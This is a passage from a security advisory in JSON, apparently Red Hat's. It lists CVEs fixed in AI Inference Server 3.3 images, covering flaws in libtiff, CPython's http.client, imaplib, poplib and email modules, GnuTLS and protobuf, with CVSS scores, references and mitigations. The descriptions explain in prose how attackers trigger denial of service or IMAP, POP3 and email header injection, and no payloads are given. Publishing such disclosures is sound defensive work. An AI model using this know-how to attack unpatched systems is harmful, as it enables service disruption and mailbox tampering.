],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libtiff: Segment fault in libtiff in TIFFReadRGBATileExt() leading to denial of service"
},
{
"cve": "CVE-2025-13836",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-12-01T19:01:03.091899+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418078"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the http.client module in the Python standard library. When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This issue allows a malicious server to cause the client to read large amounts of data into memory, potentially causing memory allocations errors, swapping, out-of-memory conditions or even system freezes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cpython: Excessive read buffering DoS in http.client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue can only be exploited by Python applications using the http.client.HTTPResponse.read function without the amount parameter, which specifies the read size in bytes. Note that Python libraries may use this function internally and make applications vulnerable. Additionally, vulnerable Python applications must connect to a malicious or compromised server that replies with a very large or crafted Content-Length header to trigger this issue, limiting the exposure of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13836"
},
{
"category": "external",
"summary": "RHBZ#2418078",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418078"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13836"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13836",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13836"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/119451",
"url": "https://github.com/python/cpython/issues/119451"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/119454",
"url": "https://github.com/python/cpython/pull/119454"
}
],
"release_date": "2025-12-01T18:02:38.483000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Since this vulnerability is triggered when no read amount is specified and the client defaults to using the potentially malicious Content-Length header, developers can mitigate this issue in their code by always imposing an explicit, safe limit on data reads.\n\nApplications using the http.client.HTTPResponse.read function directly can ensure that read operations specify a byte limit:\n\n~~~\n...\nmax_safe_read = 10 * 1024 * 1024\ndata = response.read(max_safe_read)\n...\n~~~",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cpython: Excessive read buffering DoS in http.client"
},
{
"cve": "CVE-2025-14831",
"cwe": {
"id": "CWE-407",
"name": "Inefficient Algorithmic Complexity"
},
"discovery_date": "2025-12-17T14:48:30.222000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2423177"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Moderate for Red Hat. GnuTLS is susceptible to a denial of service attack due to excessive CPU and memory consumption. This occurs when processing specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs) during certificate verification.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-14831"
},
{
"category": "external",
"summary": "RHBZ#2423177",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423177"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14831"
},
{
"category": "external",
"summary": "https://gitlab.com/gnutls/gnutls/-/issues/1773",
"url": "https://gitlab.com/gnutls/gnutls/-/issues/1773"
}
],
"release_date": "2026-02-09T14:26:34.939000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "gnutls: GnuTLS: Denial of Service via excessive resource consumption during certificate verification"
},
{
"cve": "CVE-2025-15366",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"discovery_date": "2026-01-20T22:01:33.257688+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431368"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the imaplib module in the Python standard library. The imaplib module does not reject control characters, such as newlines, in user-controlled input passed to IMAP commands. This issue allows an attacker to inject additional commands to be executed in the IMAP server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cpython: IMAP command injection in user-controlled commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have the privileges required to send malicious input to an application that sends IMAP commands to a server. Additionally, this flaw can allow attackers to manipulate the state of the mailbox (e.g., delete emails, move folders, flag messages) and to potentially read metadata or specific email content, but it does not allow arbitrary code execution or OS command injection. Due to these reasons, this issue has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-15366"
},
{
"category": "external",
"summary": "RHBZ#2431368",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431368"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-15366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15366"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-15366",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15366"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143921",
"url": "https://github.com/python/cpython/issues/143921"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/143922",
"url": "https://github.com/python/cpython/pull/143922"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/DD7C7JZJYTBXMDOWKCEIEBJLBRU64OMR/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/DD7C7JZJYTBXMDOWKCEIEBJLBRU64OMR/"
}
],
"release_date": "2026-01-20T21:40:24.938000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, ensure that no data passed to the imaplib module contains newline or carriage return characters.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cpython: IMAP command injection in user-controlled commands"
},
{
"cve": "CVE-2025-15367",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"discovery_date": "2026-01-20T22:02:09.399038+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431373"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the poplib module in the Python standard library. The poplib module does not reject control characters, such as newlines, in user-controlled input passed to POP3 commands. This issue allows an attacker to inject additional commands to be executed in the POP3 server.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cpython: POP3 command injection in user-controlled commands",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have the privileges required to send malicious input to an application that sends POP3 commands to a server. Additionally, this flaw can allow attackers to manipulate the state of the mailbox (e.g., delete emails) and to potentially read metadata or specific email content, but it does not allow arbitrary code execution or OS command injection. Due to these reasons, this issue has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-15367"
},
{
"category": "external",
"summary": "RHBZ#2431373",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431373"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-15367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15367"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-15367",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15367"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/issues/143923",
"url": "https://github.com/python/cpython/issues/143923"
},
{
"category": "external",
"summary": "https://github.com/python/cpython/pull/143924",
"url": "https://github.com/python/cpython/pull/143924"
},
{
"category": "external",
"summary": "https://mail.python.org/archives/list/security-announce@python.org/thread/CBFBOWVGGUJFSGITQCCBZS4GEYYZ7ZNE/",
"url": "https://mail.python.org/archives/list/security-announce@python.org/thread/CBFBOWVGGUJFSGITQCCBZS4GEYYZ7ZNE/"
}
],
"release_date": "2026-01-20T21:47:09.885000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, ensure that no data passed to the poplib module contains newline or carriage return characters.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "cpython: POP3 command injection in user-controlled commands"
},
{
"cve": "CVE-2026-0994",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2026-01-23T16:02:59.235878+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2432398"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in protobuf. A remote attacker can exploit this denial-of-service (DoS) vulnerability by supplying deeply nested `google.protobuf.Any` messages to the `google.protobuf.json_format.ParseDict()` function. This bypasses the intended recursion depth limit, leading to the exhaustion of Python\u2019s recursion stack and causing a `RecursionError`, which results in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python: protobuf: Protobuf: Denial of Service due to recursion depth bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is rated Important for Red Hat products. The flaw in `protobuf` allows a remote attacker to trigger a denial-of-service by providing specially crafted, deeply nested `google.protobuf.Any` messages to the `google.protobuf.json_format.ParseDict()` function. This bypasses the intended recursion depth limit, leading to resource exhaustion and application crashes.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-0994"
},
{
"category": "external",
"summary": "RHBZ#2432398",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2432398"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-0994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0994"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-0994",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0994"
},
{
"category": "external",
"summary": "https://github.com/protocolbuffers/protobuf/pull/25239",
"url": "https://github.com/protocolbuffers/protobuf/pull/25239"
}
],
"release_date": "2026-01-23T14:55:16.876000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-12T08:21:58+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2026:16174",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:16174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le",
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python: protobuf: Protobuf: Denial of Service due to recursion depth bypass"
},
{
"cve": "CVE-2026-1299",
"cwe": {
"id": "CWE-93",
"name": "Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)"
},
"discovery_date": "2026-01-23T17:02:57.343486+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2432437"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the email module in the Python standard library. When serializing an email message, the BytesGenerator class fails to properly quote newline characters for email headers. This issue is exploitable when the LiteralHeader class is used as it does not respect email folding rules, allowing an attacker to inject email headers and potentially modify message recipients or the email body, and spoof sender information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cpython: email header injection due to unquoted newlines",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue can only be exploitable by Python applications using the LiteralHeader class to write email headers, as it does not respect email folding rules. Additionally, this issue allows attackers to modify message recipients or the email body and spoof sender identity but it does not cause memory corruption or arbitrary code execution. Due to these reasons, this vulnerability has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64",
